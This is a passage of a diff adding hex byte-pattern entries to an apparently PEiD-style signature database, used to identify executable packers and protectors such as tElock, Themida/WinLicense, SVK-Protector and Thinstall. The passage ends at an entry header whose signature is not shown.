+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[SVK-Protector v1.051]
+signature = 60 EB 03 C7 84 E8 EB 03 C7 84 9A E8 00 00 00 00 5D 81 ED 10 00 00 00 EB 03 C7 84 E9 64 A0 23 00 00 00 EB
+ep_only = true
+
+[SVK-Protector v1.11]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23
+ep_only = true
+
+[SVK-Protector v1.32]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23
+ep_only = true
+
+[T-PACK v0.5c -m1]
+signature = 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 8E FE
+ep_only = true
+
+[T-PACK v0.5c -m2]
+signature = 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 CE FD
+ep_only = true
+
+[tElock 0.51 -> tE!]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 00 00 59 EB 01 EB AC 54 E8 03 00 00 00 5C EB 08 8D 64 24 04 FF 64 24 FC 6A 05 D0 2C 24 72 01 E8 01 24 24 5C F7 DC EB 02 CD 20 8D 64 24 FE F7 DC EB 02 CD 20 FE C8 E8 00 00 00 00 32 C1 EB 02 82 0D AA EB 03 82 0D 58 EB 02 1D 7A 49 EB 05 E8 01 00 00 00 7F AE 14 7E A0 77 76 75 74
+ep_only = true
+
+[tElock 0.96 -> tE!]
+signature = E9 59 E4 FF FF 00 00 00 00 00 00 00 ?? ?? ?? ?? EE ?? ?? 00 00 00 00 00 00 00 00 00 0E ?? ?? 00 FE ?? ?? 00 F6 ?? ?? 00 00 00 00 00 00 00 00 00 1B ?? ?? 00 06 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 26 ?? ?? 00 00 00 00 00 39 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C
+ep_only = true
+
+[tElock 0.98 -> tE!]
+signature = E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E ?? ?? 00 00 00 00 00 00 00 00 00 3E ?? ?? 00 2E ?? ?? 00 26 ?? ?? 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 36 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 56 ?? ?? 00 00 00 00 00 69 ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65
+ep_only = true
+
+[tElock 0.98 Special Build -> forgot & heXer]
+signature = E9 99 D7 FF FF 00 00 00 ?? ?? ?? ?? AA ?? ?? 00 00 00 00 00 00 00 00 00 CA
+ep_only = true
+
+[tElock 0.99 - 1.0 private -> tE!]
+signature = E9 ?? ?? FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[tElock 0.99 -> tE!]
+signature = E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05
+ep_only = true
+
+[tElock 0.99c (Private ECLIPSE) -> tE!]
+signature = E9 3F DF FF FF 00 00 00 ?? ?? ?? ?? 04 ?? ?? 00 00 00 00 00 00 00 00 00 24 ?? ?? 00 14 ?? ?? 00 0C ?? ?? 00 00 00 00 00 00 00 00 00 31 ?? ?? 00 1C ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65
+ep_only = true
+
+[tElock v0.41x]
+signature = 66 8B C0 8D 24 24 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 50 8B FE 68 78 01 ?? ?? 59 EB 01 EB AC 54 E8 03 ?? ?? ?? 5C EB 08
+ep_only = true
+
+[tElock v0.42]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 52 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08
+ep_only = true
+
+[tElock v0.4x - v0.5x]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01
+ep_only = true
+
+[tElock v0.51]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08
+ep_only = true
+
+[tElock v0.60]
+signature = E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08
+ep_only = true
+
+[tElock v0.70]
+signature = 60 E8 BD 10 00 00 C3 83 E2 00 F9 75 FA 70
+ep_only = true
+
+[tElock v0.71]
+signature = 60 E8 ED 10 00 00 C3 83
+ep_only = true
+
+[tElock v0.71b2]
+signature = 60 E8 44 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.71b7]
+signature = 60 E8 48 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.80]
+signature = 60 E8 F9 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.85f]
+signature = 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02
+ep_only = true
+
+[tElock v0.90]
+signature = ?? ?? E8 02 00 00 00 E8 00 E8 00 00 00 00 5E 2B
+ep_only = true
+
+[tElock v0.98]
+signature = E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E
+ep_only = true
+
+[tElock v0.98 -> tE!]
+signature = E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? 00
+ep_only = true
+
+[tElock v0.99]
+signature = E9 ?? ?? FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? 02 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 ?? ?? 02 00 00
+ep_only = true
+
+[tElock v0.99 Special Build -> heXer & forgot]
+signature = E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00
+ep_only = true
+
+[tElock v0.99 Special Build -> heXer & forgot]
+signature = E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00
+ep_only = true
+
+[The Guard Library]
+signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
+ep_only = true
+
+[TheHyper's protector -> TheHyper]
+signature = 55 8B EC 83 EC 14 8B FC E8 14 00 00 00 ?? ?? 01 01 ?? ?? 01 01 ?? ?? ?? 00 ?? ?? 01 01 ?? ?? 02 01 5E E8 0D 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8B 46 04 FF 10 8B D8 E8 0D 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 53 8B 06 FF 10 89 07 E8
+ep_only = true
+
+[Themida -> Oreans Technologies 2004]
+signature = B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8
+ep_only = true
+
+[themida 1.0.0.5 -> http://www.oreans.com]
+signature = B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44
+ep_only = true
+
+[Themida 1.0.x.x - 1.8.0.0 (compressed engine) -> Oreans Technologies]
+signature = B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8
+ep_only = true
+
+[Themida 1.0.x.x - 1.8.0.0 (compressed engine) -> Oreans Technologies]
+signature = B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 5A ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 5A ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 AF 01
+ep_only = true
+
+[Themida 1.0.x.x - 1.8.x.x (no compression) -> Oreans Technologies]
+signature = 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00
+ep_only = false
+
+[Themida 1.0.x.x - 1.8.x.x (no compression) -> Oreans Technologies]
+signature = 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB
+ep_only = false
+
+[Themida 1.2.0.1 (compressed) -> Oreans Technologies]
+signature = B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8
+ep_only = true
+
+[Themida 1.2.0.1 -> Oreans Technologies]
+signature = 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25
+ep_only = false
+
+[Themida 1.8.x.x -> Oreans Technologies]
+signature = B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67
+ep_only = true
+
+[Themida 1.8.x.x -> Oreans Technologies]
+signature = B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9
+ep_only = true
+
+[Themida/WinLicense V1.0.0.0-V1.8.0.0-> Oreans Technologies]
+signature = B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00
+ep_only = true
+
+[Themida/WinLicense V1.0.X-V1.7.X DLL -> Oreans Technologies]
+signature = B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 ?? 89 48 01 61 E9
+ep_only = true
+
+[Themida/WinLicense V1.8.0.2 + -> Oreans Technologies]
+signature = B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00
+ep_only = true
+
+[Themida/WinLicense V1.8.X-V1.9.X -> Oreans Technologies]
+signature = B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9
+ep_only = true
+
+[Themida/WinLicense V1.X NoCompression SecureEngine -> Oreans Technologies]
+signature = 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[theWRAP - by TronDoc]
+signature = 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 48 D2 4B 00 E8 BC 87 F4 FF BB 04 0B 4D 00 33 C0 55 68 E8 D5 4B 00 64 FF 30 64 89 20 E8 9C F4 FF FF E8 F7 FB FF FF 6A 40 8D 55 F0 A1 F0 ED 4B 00 8B 00 E8 42 2E F7 FF 8B 4D F0 B2 01 A1 F4 C2 40 00 E8 F7 20 F5 FF 8B F0 B2 01 A1 B4 C3 40 00 E8 F1 5B F4 FF 89 03 33 D2 8B 03 E8 42 1E F5 FF 66 B9 02 00 BA FC FF FF FF 8B C6 8B 38 FF 57 0C BA B8 A7 4D 00 B9 04 00 00 00 8B C6 8B 38 FF 57 04 83 3D B8 A7 4D 00 00 0F 84 5E 01 00 00 8B 15 B8 A7 4D 00 83 C2 04 F7 DA 66 B9 02 00 8B C6 8B 38 FF 57 0C 8B 0D B8 A7 4D 00 8B D6 8B 03 E8 2B 1F F5 FF 8B C6 E8 B4 5B F4 FF 33 D2 8B 03 E8 DF 1D F5 FF BA F0 44 4E 00 B9 01 00 00 00 8B 03 8B 30 FF 56 04 80 3D F0 44 4E 00 0A 75 3F BA B8 A7 4D 00 B9 04 00 00 00 8B 03 8B 30 FF 56 04 8B 15 B8 A7
+ep_only = true
+
+[Thinstall 2.4x - 2.5x -> Jitit Software]
+signature = 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? BD ?? ?? ?? ?? 03 E8
+ep_only = true
+
+[Thinstall 2.5 -> ???]
+signature = 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A7 1A 00 00 B9 6C 1A 00 00 BA 20 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD EC 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10
+ep_only = true
+
+[Thinstall 2.5xx -> Jtit]
+signature = 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10
+ep_only = true
+
+[Thinstall 2.5xx -> Jtit]
+signature = 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? 1A 00 00 B9 ?? 1A 00 00 BA ?? 1B 00 00 BE 00 10 00 00 BF ?? 53 00 00 BD ?? 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? ?? 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 ?? ?? ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B F1 7C 04 3B F2 7C 02 89 2E 83 C6 04 3B F7 7C E3 58 50 68 00 00 40 00 68 80 5A
+ep_only = true
+
+[Thinstall 2.628 -> Jtit]
+signature = E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01
+ep_only = true
+
+[Thinstall 2.628 -> Jtit]
+signature = E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3
+ep_only = true
+
+[Thinstall 2.736 -> Jitit]
+signature = 9C 60 E8 00 00 00 00 58 BB F3 1C 00 00 2B C3 50 68 00 00 40 00 68 00 26 00 00 68 CC 00 00 00 E8 C1 FE FF FF E9 97 FF FF FF CC CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00
+ep_only = true
+
+[Thinstall 3.035 -> Jtit]
+signature = 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00
+ep_only = true
+
+[Thinstall 3.035 -> Jtit]
+signature = 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 C3 B9 08 00 00 00 E8 01 00 00 00 C3 33 C0 E8 E1 FF FF FF 13 C0 E2 F7 C3 33 C9 41 E8 D4 FF FF FF 13 C9 E8 CD FF FF FF 72 F2 C3
+ep_only = true
+
+[Thinstall Embedded 1.9X -> Jitit]
+signature = 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 ?? ?? ?? ?? 50 E8 87 FC FF FF 59 59 A1 ?? ?? ?? ?? 8B 40 10 03 05 ?? ?? ?? ?? 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00
+ep_only = true
+
+[Thinstall Embedded 2.0X -> Jitit]
